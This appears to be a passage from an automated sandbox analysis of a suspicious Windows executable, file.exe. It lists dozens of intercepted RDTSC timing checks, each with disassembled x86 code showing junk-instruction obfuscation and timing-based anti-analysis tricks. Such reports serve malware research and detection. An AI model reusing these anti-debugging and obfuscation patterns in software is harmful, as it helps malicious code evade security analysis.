Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4610C6 second address: 4610D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7E2CEB1B16h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 461FE8 second address: 46200B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D47h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46200B second address: 46209E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E2CEB1B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F7E2CEB1B29h 0x00000011 nop 0x00000012 call 00007F7E2CEB1B24h 0x00000017 pushad 0x00000018 mov ch, 72h 0x0000001a mov si, 162Bh 0x0000001e popad 0x0000001f pop edi 0x00000020 push 00000000h 0x00000022 mov dword ptr [ebp+12472C0Ch], ebx 0x00000028 mov edi, dword ptr [ebp+122D2C8Ch] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F7E2CEB1B18h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov ebx, dword ptr [ebp+122D2EB8h] 0x00000050 xchg eax, esi 0x00000051 jmp 00007F7E2CEB1B22h 0x00000056 push eax 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a push ebx 0x0000005b pop ebx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 463016 second address: 46307E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F7E2CEC3D38h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 or dword ptr [ebp+1244CEA9h], edx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F7E2CEC3D38h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 clc 0x00000047 mov dword ptr [ebp+122D1D43h], eax 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push edx 0x00000051 je 00007F7E2CEC3D36h 0x00000057 pop edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4622B9 second address: 4622BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46307E second address: 463083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4622BD second address: 4622C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4622C1 second address: 4622C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46413F second address: 464149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4622C7 second address: 4622CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 466164 second address: 466168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 466168 second address: 4661AE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F7E2CEC3D38h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov di, 29A1h 0x0000002a mov edi, edx 0x0000002c push 00000000h 0x0000002e jmp 00007F7E2CEC3D3Ch 0x00000033 push 00000000h 0x00000035 mov edi, ebx 0x00000037 push eax 0x00000038 push eax 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 465383 second address: 465387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 465387 second address: 465392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 467240 second address: 467268 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push ebx 0x0000000a mov edi, dword ptr [ebp+122D3760h] 0x00000010 pop edi 0x00000011 push 00000000h 0x00000013 movzx ebx, si 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D2193h], ebx 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F7E2CEB1B16h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 467268 second address: 46726C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46746D second address: 467476 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4683C0 second address: 4683DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7E2CEC3D3Dh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007F7E2CEC3D3Eh 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46C304 second address: 46C309 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46D1F8 second address: 46D27D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7E2CEC3D4Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7E2CEC3D44h 0x00000010 nop 0x00000011 mov di, AD1Dh 0x00000015 jmp 00007F7E2CEC3D44h 0x0000001a push 00000000h 0x0000001c mov edi, dword ptr [ebp+122D1D0Bh] 0x00000022 adc bl, FFFFFFF0h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F7E2CEC3D38h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 push eax 0x00000042 push ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 ja 00007F7E2CEC3D36h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46D432 second address: 46D449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jg 00007F7E2CEB1B1Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46C44C second address: 46C450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46F282 second address: 46F2E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F7E2CEB1B16h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F7E2CEB1B18h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jmp 00007F7E2CEB1B1Dh 0x0000002e push 00000000h 0x00000030 mov bh, dh 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a jmp 00007F7E2CEB1B28h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46C450 second address: 46C456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46F2E3 second address: 46F2F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEB1B1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46C456 second address: 46C460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7E2CEC3D36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46F44F second address: 46F453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46F51C second address: 46F531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 ja 00007F7E2CEC3D36h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46F531 second address: 46F538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 477770 second address: 477776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 477776 second address: 477795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7E2CEB1B28h 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 477795 second address: 47779B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47779B second address: 4777A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 476EAC second address: 476EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c jng 00007F7E2CEC3D6Bh 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 476EC3 second address: 476EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7E2CEB1B16h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7E2CEB1B23h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 476EE7 second address: 476EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 477066 second address: 47706A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47706A second address: 47706E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47706E second address: 477074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 477074 second address: 477089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnp 00007F7E2CEC3D36h 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 477089 second address: 47708D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47708D second address: 477091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 477091 second address: 47709D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7E2CEB1B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47709D second address: 4770AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F7E2CEC3D36h 0x0000000a jns 00007F7E2CEC3D36h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4770AD second address: 4770B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47B83A second address: 47B840 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47B840 second address: 47B87C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7E2CEB1B18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F7E2CEB1B1Ch 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F7E2CEB1B1Fh 0x0000001a mov eax, dword ptr [eax] 0x0000001c jbe 00007F7E2CEB1B22h 0x00000022 jns 00007F7E2CEB1B1Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47BB32 second address: 47BB38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47BB38 second address: 47BB3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47BB3C second address: 47BB7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jp 00007F7E2CEC3D4Fh 0x00000010 jne 00007F7E2CEC3D3Ch 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47BB7C second address: 47BB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47BB80 second address: 47BB95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4826E7 second address: 4826ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4826ED second address: 4826F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4826F6 second address: 48270F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEB1B25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481A62 second address: 481A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7E2CEC3D36h 0x0000000a pop edx 0x0000000b jmp 00007F7E2CEC3D49h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481D32 second address: 481D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481D36 second address: 481D4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D44h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481EFF second address: 481F04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481F04 second address: 481F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7E2CEC3D36h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F7E2CEC3D3Fh 0x00000013 pushad 0x00000014 jmp 00007F7E2CEC3D45h 0x00000019 jnc 00007F7E2CEC3D36h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F7E2CEC3D36h 0x00000028 jmp 00007F7E2CEC3D45h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 482268 second address: 48226C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48226C second address: 482293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7E2CEC3D49h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F7E2CEC3D36h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 482535 second address: 48255D instructions: 0x00000000 rdtsc 0x00000002 je 00007F7E2CEB1B1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7E2CEB1B22h 0x0000000f jnp 00007F7E2CEB1B16h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48255D second address: 482561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4879BF second address: 4879C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4879C5 second address: 4879EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E2CEC3D3Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E2CEC3D41h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4879EC second address: 487A01 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007F7E2CEB1B16h 0x00000011 pop ecx 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 487A01 second address: 487A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BD7C second address: 48BD92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BD92 second address: 48BD98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BF15 second address: 48BF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7E2CEB1B16h 0x0000000a jmp 00007F7E2CEB1B21h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BF37 second address: 48BF48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F7E2CEC3D36h 0x00000009 jg 00007F7E2CEC3D36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C0FA second address: 48C115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B27h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C398 second address: 48C39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C39E second address: 48C3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C3A7 second address: 48C3AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C3AD second address: 48C3B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7E2CEB1B16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C3B7 second address: 48C3BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C973 second address: 48C97B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C97B second address: 48C98B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C98B second address: 48C993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C993 second address: 48C99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48CCB3 second address: 48CCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48CCB9 second address: 48CCC4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43E1F5 second address: 43E1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43E1F9 second address: 43E20F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F7E2CEC3D3Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43E20F second address: 43E21B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
